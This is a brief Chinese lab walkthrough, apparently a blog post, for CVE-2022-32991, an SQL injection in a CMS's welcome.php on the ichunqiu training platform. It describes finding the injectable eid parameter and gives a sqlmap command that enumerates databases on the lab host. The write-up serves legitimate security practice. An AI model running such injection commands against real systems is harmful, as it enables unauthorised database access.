[春秋云境] CVE-2022-32991

不想学密码的程序员不是好的攻城狮2023-09-23 14:14

CVE-2022-32991

靶标介绍

该CMS的welcome.php中存在SQL注入攻击。

解题过程

进入主界面,没有明显可以注入的地方,先注册登录。

登录之后的界面
此处有个?q=1但是多次测试后,感觉不是注入点。
点击这个按钮,进入新的界面。
多次测试发现注入点

sqlmap梭哈

复制代码 
sqlmap -u "http://eci-2zeb8alt7sk432zz6n7j.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e*&n=1&t=10" --dbs

sqlmap指定参数进行注入

相关推荐
TechWayfarer1 分钟前
查IP归属地接入实战:保险理赔如何做动态风险监控与预警
网络·python·tcp/ip·安全·flask
speop26 分钟前
AMD | task02
python
lili00121 小时前
2026 企业 AI 选型新范式:OpenRouter Fusion 证明多模型融合性价比远超单模型,企业该如何重构技术栈? - 微元算力(weytoken)
java·人工智能·python·重构·ai编程
Keano Reurink1 小时前
搜索API与GSC数据对比:发现数据盲区
数据库·python·数据挖掘
大黄说说1 小时前
深入理解 Go 协程 Goroutine:并发编程的核心精髓
java·数据库·python
cd988801 小时前
2026年,电销机器人哪家强?
python
搏博1 小时前
多传感器融合基础之一图像空间(Image Space)全面解析
图像处理·python·图像空间·融合感知
2601_961875242 小时前
花生十三资源盘|电子版|全科
python·django·flask·virtualenv·scikit-learn·pygame·tornado
郝学胜-神的一滴2 小时前
完全二叉树与堆底层原理深度剖析 | 手写C++大顶堆实现
java·开发语言·数据结构·c++·python·算法
WangN22 小时前
【通识】宇树G1_29DOF速度跟踪训练—逐章学习手册
人工智能·python·学习·机器人·具身智能
热门推荐
012026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?022026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04HTTP 与 HTTPS 的区别:从原理到实战详解05【AI】2026 年具身智能模型和世界模型总结06GitHub 镜像站点07上线仅72小时被强制下架:Claude Fable 5 的短命08AI科技热点日报 | 2026年6月1日09Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析10《置身钉内》原文-可播放阅读